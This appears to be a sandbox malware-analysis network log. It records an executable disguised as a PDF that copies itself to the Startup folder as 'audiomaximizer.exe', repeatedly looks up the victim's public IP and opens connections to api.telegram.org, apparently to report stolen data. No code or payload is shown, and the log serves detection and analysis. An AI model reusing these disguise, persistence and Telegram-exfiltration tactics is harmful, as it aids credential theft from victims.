Jan 13, 2025 12:08:31.950562954 CET	443	49773	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:32.504878998 CET	80	49772	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:32.506238937 CET	49774	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:32.506273985 CET	443	49774	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:32.506336927 CET	49774	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:32.506614923 CET	49774	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:32.506628990 CET	443	49774	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:32.550108910 CET	49772	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:32.621587992 CET	443	49773	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:32.633318901 CET	49773	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:32.633356094 CET	443	49773	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:32.633423090 CET	49773	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:32.633445024 CET	443	49773	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:32.872342110 CET	443	49773	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:32.872534990 CET	443	49773	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:32.872615099 CET	49773	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:32.872807026 CET	49773	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:32.970576048 CET	443	49774	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:32.972028971 CET	49774	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:32.972054958 CET	443	49774	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:33.114842892 CET	443	49774	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:33.115058899 CET	443	49774	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:33.115241051 CET	49774	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:33.115413904 CET	49774	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:33.118060112 CET	49772	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:33.119123936 CET	49775	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:33.123130083 CET	80	49772	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:33.123214006 CET	49772	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:33.124097109 CET	80	49775	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:33.124183893 CET	49775	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:33.124239922 CET	49775	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:33.129050970 CET	80	49775	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:33.987791061 CET	80	49775	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:33.994393110 CET	49776	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:33.994524002 CET	443	49776	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:33.994597912 CET	49776	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:33.994827986 CET	49776	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:33.994854927 CET	443	49776	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:34.034460068 CET	49775	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:34.482867956 CET	443	49776	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:34.484915972 CET	49776	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:34.484977007 CET	443	49776	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:34.618917942 CET	443	49776	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:34.619057894 CET	443	49776	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:34.619138956 CET	49776	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:34.619457006 CET	49776	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:34.632385015 CET	49775	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:34.632812023 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:34.632903099 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:34.633043051 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:34.633506060 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:34.633541107 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:34.637557030 CET	80	49775	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:34.637635946 CET	49775	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:35.277810097 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:35.277923107 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:35.279777050 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:35.279798985 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:35.280131102 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:35.281398058 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:35.323337078 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:35.524301052 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:35.524446011 CET	443	49777	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:35.524548054 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:35.527189970 CET	49777	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:42.662573099 CET	49759	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:42.807441950 CET	49778	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:42.807526112 CET	443	49778	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:42.807756901 CET	49778	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:42.807993889 CET	49778	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:42.808011055 CET	443	49778	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:43.412666082 CET	443	49778	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:43.414372921 CET	49778	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:43.414405107 CET	443	49778	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:43.414499044 CET	49778	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:43.414515018 CET	443	49778	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:43.858088017 CET	443	49778	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:43.858161926 CET	443	49778	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:43.858222008 CET	49778	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:43.858583927 CET	49778	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 12:08:07.079408884 CET	51353	53	192.168.2.4	1.1.1.1
Jan 13, 2025 12:08:07.086311102 CET	53	51353	1.1.1.1	192.168.2.4
Jan 13, 2025 12:08:09.895819902 CET	58362	53	192.168.2.4	1.1.1.1
Jan 13, 2025 12:08:09.903475046 CET	53	58362	1.1.1.1	192.168.2.4
Jan 13, 2025 12:08:22.900878906 CET	52146	53	192.168.2.4	1.1.1.1
Jan 13, 2025 12:08:22.908869028 CET	53	52146	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 12:08:07.079408884 CET	192.168.2.4	1.1.1.1	0x7fe5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.895819902 CET	192.168.2.4	1.1.1.1	0x31f6	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:22.900878906 CET	192.168.2.4	1.1.1.1	0x8ab4	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 12:08:07.086311102 CET	1.1.1.1	192.168.2.4	0x7fe5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 12:08:07.086311102 CET	1.1.1.1	192.168.2.4	0x7fe5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:07.086311102 CET	1.1.1.1	192.168.2.4	0x7fe5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:07.086311102 CET	1.1.1.1	192.168.2.4	0x7fe5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:07.086311102 CET	1.1.1.1	192.168.2.4	0x7fe5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:07.086311102 CET	1.1.1.1	192.168.2.4	0x7fe5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.903475046 CET	1.1.1.1	192.168.2.4	0x31f6	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.903475046 CET	1.1.1.1	192.168.2.4	0x31f6	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.903475046 CET	1.1.1.1	192.168.2.4	0x31f6	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.903475046 CET	1.1.1.1	192.168.2.4	0x31f6	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.903475046 CET	1.1.1.1	192.168.2.4	0x31f6	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.903475046 CET	1.1.1.1	192.168.2.4	0x31f6	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:09.903475046 CET	1.1.1.1	192.168.2.4	0x31f6	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:08:22.908869028 CET	1.1.1.1	192.168.2.4	0x8ab4	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:07.104523897 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:08.976592064 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 12:08:09.023787022 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 12:08:09.859023094 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 12:08:10.580598116 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 12:08:10.897963047 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:11.508167028 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 12:08:12.349210024 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:12.967997074 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:14.801299095 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:15.439703941 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:16.284544945 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:17.065684080 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:17.875715017 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:18.539208889 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:19.367412090 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:20.016923904 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:20.832367897 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 12:08:20.835899115 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 12:08:21.128580093 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 12:08:21.846529007 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 12:08:22.138021946 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:20.025558949 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:20.847276926 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49753	132.226.8.169	80	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:21.457597017 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:22.277165890 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49759	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:22.871928930 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 12:08:23.713212013 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49764	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:24.373344898 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:25.299108028 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49766	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:25.935116053 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
